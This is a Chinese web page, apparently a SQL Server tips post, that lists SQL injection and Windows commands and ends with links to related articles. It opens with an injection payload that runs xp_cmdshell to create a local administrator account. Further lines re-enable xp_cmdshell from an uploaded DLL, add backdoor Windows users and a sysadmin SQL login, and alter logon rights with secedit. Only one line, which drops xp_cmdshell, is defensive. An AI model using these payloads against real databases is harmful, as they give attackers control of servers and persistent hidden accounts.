;exec master..xp_cmdshell "net user name password /add"-- ;exec master..xp_cmdshell "net localgroup administrators name /add"--
程序代码开启cmdshell的SQL语句
EXEC sp_addextendedproc xp_cmdshell ,@dllname =''xplog70.dll''
判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype=''X'' and name=''xp_cmdshell'' 返回结果为1就OK
恢复xp_cmdshell Exec master.dbo.addextendedproc ''xp_cmdshell'',''xplog70.dll'';select count(*) from master.dbo.sysobjects where xtype=''X'' and name=''xp_cmdshell'' 返回结果为1就OK
否则上传xplog7.0.dll Exec master.dbo.addextendedproc ''xp_cmdshell'',''C:/WinNt/System32/xplog70.dll''
堵上cmdshell的SQL语句 sp_dropextendedproc "xp_cmdshell"
DOS: dir c:/ dir d:/ dir e:/
net user TsInternetUsers Password /add net localGroup Administrators TsInternetUsers /add
备份恢复IPSEC
secedit /export /CFG c:/tmp.inf echo sedenynetworklogonright =>>c:/tmp.inf secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf
SQL: exec master..sp_addlogin UserName,Password exec master..sp_addsrvrolemember UserName,sysadmin
关注此文的读者还看过:
- 2010-4-1 18:12:45 预防非法表D99_Tmp,kill_kk的建立
- 2008-4-23 15:53:39 SQL Server数据库超级管理员账号防护知识
- 2008-4-11 21:37:35 SQL Server 2005数据库镜像配置脚本示例
- 2008-4-4 9:12:54 讲解如何实现互联网上数据库的安全
- 2008-4-1 11:07:24 SQL 2005数据库转到SQL 2000的步骤讲解
- 2008-3-31 12:39:45 SQL Server自动生成日期加数字的序列号
- 2008-3-31 12:39:07 SQL Server 2000的数据库容量究竟是多大
- 2008-3-18 18:01:49 SQL Server 2005数据库的同义词Bug 讲解
|